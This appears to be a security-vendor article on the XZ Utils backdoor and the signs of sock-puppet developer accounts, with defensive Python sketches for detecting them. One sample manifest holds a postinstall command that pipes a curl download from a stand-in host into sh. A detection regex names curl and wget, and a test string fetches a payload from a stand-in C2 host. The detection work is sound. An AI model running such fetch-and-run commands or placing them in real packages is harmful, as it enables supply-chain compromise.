The high-profile compromise of the XZ Utils open-source compression library, disclosed last week, highlights an under-reported threat: social engineering attacks that target open-source package maintainers and other developers to stage software supply chain attacks.
The coordinated social engineering campaign targeting XZ Utils' longtime maintainer, Lasse Collin, featured several presumably phony “sock puppet” developer accounts. They carried out a pressure campaign aimed at getting Collin to allow code contributions from Jia Tan (JiaT75), a developer account that had become an active contributor to XZ Utils in the preceding months, and eventually to hand control of the XZ Utils project to Tan.
As other researchers have noted, Tan’s involvement in the XZ Utils project built steadily over the span of more than a year, during which time Collin faced mounting pressure online from a curious assortment of new and noisy developer accounts. They frequently called out Collin in online posts for the slow pace of patches to xz-utils and the need for more integrations. In response, Collin cited “long term mental health” issues and other conflicts as the cause of his reduced attention to the XZ Utils project.
The developer accounts, with names such as Jigar Kumar and Dennis Ens, pressured Collin to get help maintaining the XZ Utils project. Waiting in the wings was Tan, and Collin eventually ceded control to him or her. That allowed Tan to insert malicious implants in the XZ Utils code. Meanwhile, more sock puppet accounts, with names such as Hans Jansen, misoeater91, and krygorin4545, cropped up to pressure the maintainers of prominent Linux distributions such as Debian to fold the latest versions of XZ Utils into their standard images.
The flurry of open-source code contributions and related pressure campaigns from previously unknown developer accounts suggests that a coordinated social engineering campaign built on phony developer accounts was used to sneak malicious code into a widely used open-source project. That leaves developers to wonder how they can distinguish a suspicious sock-puppet developer account from a legitimate contributor or downstream user of their code.
While there is no foolproof method to smoke out a phony developer account, there are telltale signs you can look for. Threat researchers share a few key indicators.
1. Be on the lookout for new and noisy developer accounts
One characteristic of sock-puppet and malicious developer accounts is that they tend to be both new and highly active, posting a rapid succession of projects and updates within a short period of time. That’s not unique to malicious accounts, but it does stand out from the usual cadence that we see with legitimate developer accounts, which tend to build gradually with contributions spread out over time.
For example, ReversingLabs' recent research on the BIPClip campaign of malicious Python Package Index (PyPI) projects focused on two packages that were published by james_pycode, a throwaway PyPI maintainer account that was created on the same day the two packages were published. That’s something ReversingLabs often observes with malicious campaigns distributed through open-source package repositories.
And, unlike the attack on XZ, attackers typically make only a minimal effort to bolster the reputation or credibility of these malicious accounts — uploading no avatar and providing limited information about the developer beyond their account name. However, that’s not always the case. Sophisticated supply chain attackers that leverage open-source repositories often invest time and resources to mimic official pages and legitimate developer accounts. The IconBurst campaign that ReversingLabs uncovered in July 2022 is an example of this type of operation.
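The "new and noisy" pattern can be expressed as a simple check. The sketch below is illustrative only: the `Release` type, the `is_new_and_noisy` function, and the thresholds (seven days, two releases) are assumptions made for this example, and the account creation and publish timestamps would have to be collected from whatever metadata a given registry exposes. A hit is a reason to look closer, not proof of malice.

```python
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class Release:
    """Hypothetical record of one published package version."""
    package: str
    published: datetime


def is_new_and_noisy(account_created, releases, max_age_days=7, min_releases=2):
    """Return True if the account published at least `min_releases`
    releases within `max_age_days` of being created.

    Both thresholds are illustrative assumptions, not established cutoffs.
    """
    window_end = account_created + timedelta(days=max_age_days)
    early = [r for r in releases if account_created <= r.published <= window_end]
    return len(early) >= min_releases


# Example: an account that publishes two packages on the day it is created.
created = datetime(2024, 3, 1, 9, 0)
releases = [
    Release("example-pkg-a", datetime(2024, 3, 1, 10, 0)),
    Release("example-pkg-b", datetime(2024, 3, 1, 11, 30)),
]
print(is_new_and_noisy(created, releases))
```

Legitimate new developers will sometimes trip a check like this, so it works best as one signal among several.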
2. Really good operational security is a cause for concern
Another red flag that a developer account may be a malicious sock puppet is unusually tight OpSec, or operational security. That’s a military term for the process of concealing information that could reveal one's identity or intentions.
Historically, the open-source community has been a transparent environment, with developers contributing their personal time and resources to support many different projects while weighing in on discussion boards and in other venues. Developer accounts are frequently linked to email addresses that also crop up elsewhere on the web, including on social networks such as LinkedIn. Also, patterns of activity such as code commits can reveal IP addresses and even details about the time zone a developer is likely working from (assuming they work during daylight hours), narrowing the geography in which they are located.
So, with a minimum of effort, it is usually possible to tie a developer’s activity on an open-source platform to something real, said Robert Perica, a principal engineer at ReversingLabs: a personal or employer email address, a personal web page, social media accounts, and so on.
But it probably won't be possible in the case of sock-puppet accounts such as those behind the XZ Trojan incident. As noted by security journalist Brian Krebs, neither the email used by the malicious developer, Jia Tan, nor those used by the supporting harasser accounts show up anywhere else on the Internet — including in massive data dumps. That’s highly suspicious.
“To see this complete lack of presence in breached databases once or twice in the course of an investigation is rare, but to find it multiple times suggests we're dealing with an operation that was set up carefully from the beginning. And that almost certainly means a group project (state-sponsored).”
—Brian Krebs
Researcher Evan Boehs noted in his analysis that the “Jia Tan” developer was present on other platforms, such as the #tukaani IRC channel on Libera.Chat. The IP addresses associated with that activity likely belonged to a proxy server, he said.
Boehs said that the developer’s name suggests that Jia Tan is of Chinese descent and possibly based in Hong Kong. However, he wrote that “independent analysis of commit timings concludes that the perpetrator worked 'Office Hours' in a UTC+02/03 timezone,” and that the developer “worked through the Lunar New Year, and did not work on some notable Eastern European holidays, including Christmas and New Year.” That casts doubt on any link between the campaign and China or Hong Kong.
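To make the idea of commit-timing analysis concrete, here is a minimal sketch of one way to estimate a contributor's working time zone from commit timestamps. It is not the method used in the independent analysis cited above. The function names and the office-hours window (Monday to Friday, 09:00 to 18:00) are assumptions for illustration, and timestamps can be forged, so the result is a hint at best.

```python
from datetime import datetime, timedelta, timezone


def office_hours_share(commits_utc, utc_offset_hours, start=9, end=18):
    """Fraction of commits that land on a weekday between `start` and `end`
    (local hour, end exclusive) when viewed in the given UTC offset.

    `commits_utc` must contain timezone-aware datetimes.
    """
    if not commits_utc:
        return 0.0
    tz = timezone(timedelta(hours=utc_offset_hours))
    hits = 0
    for ts in commits_utc:
        local = ts.astimezone(tz)
        if local.weekday() < 5 and start <= local.hour < end:
            hits += 1
    return hits / len(commits_utc)


def rank_offsets(commits_utc, offsets=range(-12, 15)):
    """Return (offset, share) pairs, most office-hours-like offset first."""
    scores = [(off, office_hours_share(commits_utc, off)) for off in offsets]
    return sorted(scores, key=lambda pair: pair[1], reverse=True)


# Example with made-up timestamps: one working week of commits in UTC.
commits = [
    datetime(2024, 1, day, hour, 0, tzinfo=timezone.utc)
    for day in range(8, 13)      # Monday 8 Jan to Friday 12 Jan 2024
    for hour in (7, 10, 15)
]
for offset, share in rank_offsets(commits)[:3]:
    print(f"UTC{offset:+d}: {share:.0%} of commits in office hours")
```

Several neighboring offsets will often score similarly, so the output narrows the plausible geography rather than pinpointing it. Checking activity against regional holidays, as the quoted analysis did, is a complementary signal.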
Who are Jia Tan and his or her accomplices? Because of really good OpSec, we may never know. That's a red flag for development organizations considering packages authored by such accounts.
3. Decode phonies by looking for clues in the developer's code
It is possible to smoke out malicious sock-puppet developer accounts by taking a look under the hood at the code they are claiming responsibility for. As ReversingLabs research has shown, clues in the packages pushed by developer accounts can often signal that something is amiss.
The most obvious clues that stand out include the use of “typosquatting”: naming projects and code to closely resemble well-established and widely used open-source packages. For example, a malicious software supply chain campaign that ReversingLabs researchers uncovered in October 2023 hinged on a package, node-hide-console-windows, which downloaded a Discord bot that facilitated the planting of an open-source rootkit, r77.
The package was mimicking the legitimate npm package node-hide-console-window, which is used to toggle an application’s console window visibility. If a new maintainer account is pushing rapid updates to a brand-new open-source package that has a name closely resembling another widely used open-source package, it's a good sign they are bogus.
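A basic typosquatting check compares a new package name against a list of well-known names and flags near misses. The sketch below uses Levenshtein edit distance. The function names, the two-edit threshold, and the short list of popular names are assumptions for this example, and in practice the list would come from registry download statistics.

```python
def edit_distance(a, b):
    """Levenshtein distance between two strings (dynamic programming)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, start=1):
        curr = [i]
        for j, cb in enumerate(b, start=1):
            cost = 0 if ca == cb else 1
            curr.append(min(prev[j] + 1,          # deletion
                            curr[j - 1] + 1,      # insertion
                            prev[j - 1] + cost))  # substitution or match
        prev = curr
    return prev[-1]


def possible_typosquats(candidate, popular_names, max_distance=2):
    """Return popular names that `candidate` nearly matches without being equal."""
    return [
        name for name in popular_names
        if name != candidate and edit_distance(candidate, name) <= max_distance
    ]


# The pair of names discussed above differs by a single trailing "s".
popular = ["node-hide-console-window", "express"]
print(possible_typosquats("node-hide-console-windows", popular))
# → ['node-hide-console-window']
```

Edit distance misses other lookalike tricks, such as swapped word order or a changed scope, so a name match is best combined with the account-age and activity signals described earlier.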
Aside from typosquatting, code obfuscation or network activities in postinstall scripts that are executed immediately after package installation often indicate something is amiss. (ReversingLabs researchers documented the use of both of these approaches in the March 2022 Material Tailwind campaign.)
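For npm packages, install-time behavior is declared in the `scripts` section of `package.json`, so a first-pass check can be automated. The sketch below flags install hooks whose command line contains an obvious network indicator. The function name and the indicator pattern are assumptions for illustration. It will not catch a hook that simply runs a local script file, which would need to be inspected separately, and it does not attempt to detect obfuscation.

```python
import json
import re

# npm lifecycle hooks that run automatically during installation.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Illustrative, deliberately incomplete list of network indicators.
NETWORK_HINTS = re.compile(r"curl|wget|https?://|Invoke-WebRequest", re.IGNORECASE)


def suspicious_install_scripts(package_json_text):
    """Return {hook: command} for install hooks that appear to reach the network."""
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts", {})
    findings = {}
    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if command and NETWORK_HINTS.search(command):
            findings[hook] = command
    return findings


# Example manifest with a made-up postinstall command.
example = json.dumps({
    "name": "example-package",
    "scripts": {"postinstall": "curl http://example.invalid/setup.sh | sh"},
})
print(suspicious_install_scripts(example))
```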
At other times, malicious packages are copied across multiple open-source projects with different names using either the same maintainer account or a constellation of different accounts. The ReversingLabs research team found such behavior in the recent GitGot campaign. Two malicious packages, warbeast2000 and kodiak2k, were observed being published to the npm open-source package manager by a variety of maintainer accounts.
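One way to spot the same payload reappearing under different names is to fingerprint package contents and group packages that share a fingerprint. The sketch below is an assumption-laden illustration: the function names and input shape are invented for this example, the manifest is ignored because it necessarily differs between names, and exact hashing only catches byte-identical copies. Lightly modified copies would need fuzzy matching.

```python
import hashlib
from collections import defaultdict


def fingerprint(files):
    """Hash a package's contents. `files` maps relative path -> bytes."""
    digest = hashlib.sha256()
    for path in sorted(files):
        digest.update(path.encode("utf-8"))
        digest.update(b"\0")
        digest.update(hashlib.sha256(files[path]).digest())
    return digest.hexdigest()


def group_lookalikes(packages, ignore=("package.json",)):
    """Group packages with identical contents.

    `packages` maps (maintainer, package_name) -> {path: bytes}.
    Returns a list of groups that contain more than one package.
    """
    groups = defaultdict(list)
    for key, files in packages.items():
        kept = {p: data for p, data in files.items() if p not in ignore}
        groups[fingerprint(kept)].append(key)
    return [sorted(members) for members in groups.values() if len(members) > 1]


# Example with made-up maintainers and packages.
packages = {
    ("maintainer-a", "pkg-one"): {"index.js": b"payload()", "package.json": b"{1}"},
    ("maintainer-b", "pkg-two"): {"index.js": b"payload()", "package.json": b"{2}"},
    ("maintainer-c", "pkg-three"): {"index.js": b"harmless()"},
}
print(group_lookalikes(packages))
```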
Finally, malicious packages from different maintainers may beacon to shared, malicious command-and-control (C2) infrastructure. The Material Tailwind campaign malware, for example, used Google Drive, Microsoft OneDrive, and GitHub to fetch the address of the real C2 server. In the IAmReboot campaign, the ReversingLabs threat research team documented malicious NuGet packages that acted as downloaders for second-stage malware: an obfuscated version of the SeroXen RAT hosted in a GitHub repository.
Collecting valuable threat intelligence such as the IP addresses of suspicious or malicious infrastructure can help close the door on malicious packages before they infiltrate your development pipeline.
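As a rough sketch of how such threat intelligence might be applied, the code below extracts IPv4 addresses and URL hostnames from a package's text and intersects them with a blocklist. The function names and the blocklist contents are assumptions for this example. The addresses use reserved documentation ranges, and a real pipeline would draw its indicators from a threat intelligence feed. Plain pattern matching also produces false positives, since a dotted version string can look like an IP address.

```python
import ipaddress
import re

IPV4_CANDIDATE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOST_IN_URL = re.compile(r"https?://([A-Za-z0-9.-]+)", re.IGNORECASE)


def extract_indicators(text):
    """Collect valid IPv4 addresses and URL hostnames found in `text`."""
    indicators = set()
    for candidate in IPV4_CANDIDATE.findall(text):
        try:
            indicators.add(str(ipaddress.ip_address(candidate)))
        except ValueError:
            pass  # e.g. 999.1.1.1 is not a valid address
    for host in HOST_IN_URL.findall(text):
        indicators.add(host.lower().rstrip("."))
    return indicators


def matches_blocklist(text, blocklist):
    """Return the indicators in `text` that also appear in `blocklist`."""
    return extract_indicators(text) & set(blocklist)


# Example with made-up source text and a made-up blocklist.
source = 'fetch("http://c2.example.invalid/payload"); connect("192.0.2.10");'
print(matches_blocklist(source, {"192.0.2.10", "198.51.100.7"}))
# → {'192.0.2.10'}
```

Running the same extraction across packages from different maintainers and looking for indicators that recur is one way to surface the shared infrastructure described above.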
Key lesson: Where there's smoke, there may be fire
Of course, none of these telltale signs is conclusive of a malicious actor or campaign. Millions of open-source developers are working across the globe on a mind-bending number of projects, both commercial and personal. That creates room for all manner of strange or ill-conceived activity around developer accounts that may not be malicious.
However, where there’s smoke, there is often fire. The coincidence of one or more of these telltale signs of a malicious sock-puppet developer account should prompt developers and development teams to pause and take a closer look at the code they're considering using. And the developers responsible for maintaining the code should second that effort.